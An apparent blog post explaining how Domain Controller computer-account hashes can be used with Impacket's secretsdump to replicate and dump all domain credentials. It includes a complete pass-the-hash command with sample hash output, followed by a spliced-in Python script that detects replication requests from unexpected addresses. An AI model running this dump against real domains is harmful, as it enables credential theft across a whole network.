Using Domain Controller Account Passwords To HashDump Domains


Since I follow both Carlos Perez and Benjamin Delpy on Twitter, something caught my eye on August 2nd, soon after Benjamin Delpy dropped DCSync:

And then later on August 28th, again about the DC$ account (Domain Controller computer account):

Because DCSync calls the replication (“sync”) APIs of Active Directory, which by default are used only by Domain Controllers, every Domain Controller computer account has the ability to do this, just like the Domain/Enterprise Admins.

Anyone who’s ever administered an Active Directory knows that computer accounts change their passwords automatically. How often do they change them?

https://support.microsoft.com/en-us/kb/154501:

“Machine account passwords are regularly changed for security purposes. By default, on Windows NT-based computers, the machine account password automatically changes every seven days. Starting with Windows 2000-based computers, the machine account password automatically changes every 30 days.”

PSSSST!! That article is about how to DISABLE automatic password changing.


Alright. I’m not going to go into “how” to get the hashes for a computer account, but if you’ve ever dumped passwords before, the computer accounts are the ones with the “$” on the end. Find the ones that are domain controllers, match up the hashes, and use Impacket’s secretsdump.py to your heart’s content. (Or until the password changes for that DC; then you use another one to dump it again. Oh, did I not mention that computers don’t all change their passwords at the same time in that 30-day window?)

Remember, Domain Controllers don’t have a lot of other permissions, so you need to use the “-just-dc” option in SecretsDump in order for it to do just the domain dump:

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc LAB/DC2k8_1\$@172.16.102.15

Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
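The flip side of this for defenders, as an added example that is not from the original post or from Impacket: a replication request authenticated as a DC$ account looks like normal DC-to-DC replication unless you also check where the logon came from. The script below joins Security event 4662 (which carries the replication control-access GUIDs) with 4624 (which carries the source address) on the logon ID, so a DC computer account used from anywhere but its own DC stands out. The DC names, addresses and events are constructed.

```python
import re

# Control-access-right GUIDs that appear in the 4662 "Properties" field of a
# replication (DCSync-style) request.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Constructed inventory (assumption): DC computer accounts and the address each
# one replicates from. Keys are upper-case so lookups are case-insensitive.
DC_ACCOUNTS = {"DC2K8_1$": "172.16.102.15", "DC2K8_2$": "172.16.102.16"}

# Constructed sample events, reduced to the fields the correlation needs.
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: DC2K8_2$ logs on from its own address.
    {"EventID": 4624, "TargetUserName": "DC2K8_2$", "TargetLogonId": "0x1a2b", "IpAddress": "172.16.102.16"},
    {"EventID": 4662, "SubjectUserName": "DC2K8_2$", "SubjectLogonId": "0x1a2b",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # The case from the post: a DC$ credential used from a workstation address.
    {"EventID": 4624, "TargetUserName": "dc2k8_1$", "TargetLogonId": "0x3c4d", "IpAddress": "172.16.50.23"},
    {"EventID": 4662, "SubjectUserName": "dc2k8_1$", "SubjectLogonId": "0x3c4d",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A plain user account requesting replication rights.
    {"EventID": 4624, "TargetUserName": "jdoe", "TargetLogonId": "0x5e6f", "IpAddress": "172.16.50.44"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectLogonId": "0x5e6f",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Same user touching an unrelated property GUID: not a replication request.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectLogonId": "0x5e6f",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def find_suspicious_replication(events, dc_accounts=DC_ACCOUNTS):
    """Return (account, source_ip, reason) for every replication request that was
    not made by a known DC account logged on from that DC's own address."""
    # 4624 carries the source address; 4662 only carries the logon ID, so join on it.
    source_by_logon = {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}
    findings = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        guids = set(re.findall(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", e["Properties"].lower()))
        if not guids & REPLICATION_RIGHTS:
            continue
        account = e["SubjectUserName"].upper()
        source = source_by_logon.get(e["SubjectLogonId"], "unknown")
        if dc_accounts.get(account) == source:
            continue  # expected: a DC replicating from its own address
        reason = "DC account used from unexpected address" if account in dc_accounts else "non-DC principal"
        findings.append((account, source, reason))
    return findings
```

In a real deployment the allowlist comes from your DC inventory and both event IDs need auditing enabled (4662 requires a SACL on the domain object for the replication rights), otherwise the join has nothing to work with.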

Happy #HackersDay